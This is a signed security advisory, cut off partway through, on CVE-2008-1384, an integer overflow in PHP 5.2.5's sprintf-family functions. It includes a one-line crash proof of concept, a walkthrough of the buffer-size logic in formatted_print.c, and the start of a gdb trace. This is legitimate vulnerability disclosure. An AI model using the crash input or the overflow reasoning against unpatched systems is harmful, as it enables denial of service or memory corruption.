|
-----BEGIN PGP SIGNED MESSAGE-----=0D
Hash: SHA1=0D
=0D
[PHP 5.2.5 and prior : *printf() functions Integer Overflow ]=0D
=0D
Author: Maksymilian Arciemowicz (cXIb8O3)=0D
SecurityReason.com and SecurityReason.pl=0D
Date:=0D
- - Written: 01.03.2008=0D
- - Public: 20.03.2008=0D
=0D
SecurityReason Research=0D
SecurityAlert Id: 52=0D
=0D
CVE-2008-1384=0D
SecurityRisk: Low=0D
=0D
Affected Software: PHP 5.2.5 and prior=0D
Advisory URL:=0D
http://securityreason.com/achievement_securityalert/52=0D
Vendor: http://www.php.net=0D
=0D
- --- 0.Description ---=0D
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.=0D
=0D
These functions all manipulate strings in various ways. Some more specialized sections can be found in the regular expression and URL handling sections.=0D
=0D
For information on how strings behave, especially with regard to usage of single quotes, double quotes, and escape sequences, see the Strings entry in the Types section of the manual.=0D
=0D
- --- 1. *printf() functions Integer Overflow ---=0D
The main problem exists in formatted_print.c file.=0D
=0D
cxib# uname -a=0D
FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386=0D
cxib# php -v=0D
PHP 5.2.5 (cli) (built: Mar 13 2008 21:34:01) (DEBUG)=0D
Copyright (c) 1997-2007 The PHP Group=0D
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies=0D
cxib# cat /www/printf.php=0D
=0D
sprintf("[%'A2147483646s]\n", "A");=0D
?>=0D
cxib# php /www/printf.php=0D
Segmentation fault (core dumped)=0D
=0D
Good. Let's see to formatted_print.c file in php_sprintf_appendstring() function =0D
=0D
- ---formatted_print.c-start---=0D
inline static void=0D
php_sprintf_appendstring(char **buffer, int *pos, int *size, char *add,=0D
int min_width, int max_width, char padding,=0D
int alignment, int len, int neg, int expprec, int always_sign)=0D
- ---formatted_print.c-end---=0D
=0D
The main varible what we will see is "npad"=0D
=0D
=0D
- ---formatted_print.c-start---=0D
copy_len = (expprec ? MIN(max_width, len) : len);=0D
npad = min_width - copy_len;=0D
- ---formatted_print.c-end---=0D
=0D
good. npad is 2147483646=0D
=0D
=0D
- ---formatted_print.c-start---=0D
req_size = *pos + MAX(min_width, copy_len) + 1;=0D
- ---formatted_print.c-end---=0D
=0D
req_size overflow=0D
=0D
- ---formatted_print.c-start---=0D
if (req_size > *size) {=0D
while (req_size > *size) {=0D
*size <<= 1;=0D
}=0D
PRINTF_DEBUG(("sprintf ereallocing buffer to %d bytes\n", *size));=0D
*buffer = erealloc(*buffer, *size);=0D
}=0D
- ---formatted_print.c-end---=0D
=0D
(req_size > *size) is False=0D
=0D
(alignment == ALIGN_RIGHT) is True so=0D
=0D
- ---formatted_print.c-start---=0D
while (npad-- > 0) {=0D
(*buffer)[(*pos)++] = padding;=0D
}=0D
- ---formatted_print.c-end---=0D
=0D
and finish. Let's debug it with gdb=0D
=0D
- --- Debug ---=0D
0x08295ba5 in php_sprintf_appendstring (buffer=0xbfbfd318, pos=0xbfbfd31c, =0D
size=0xbfbfd324, add=0x28f20404 'A'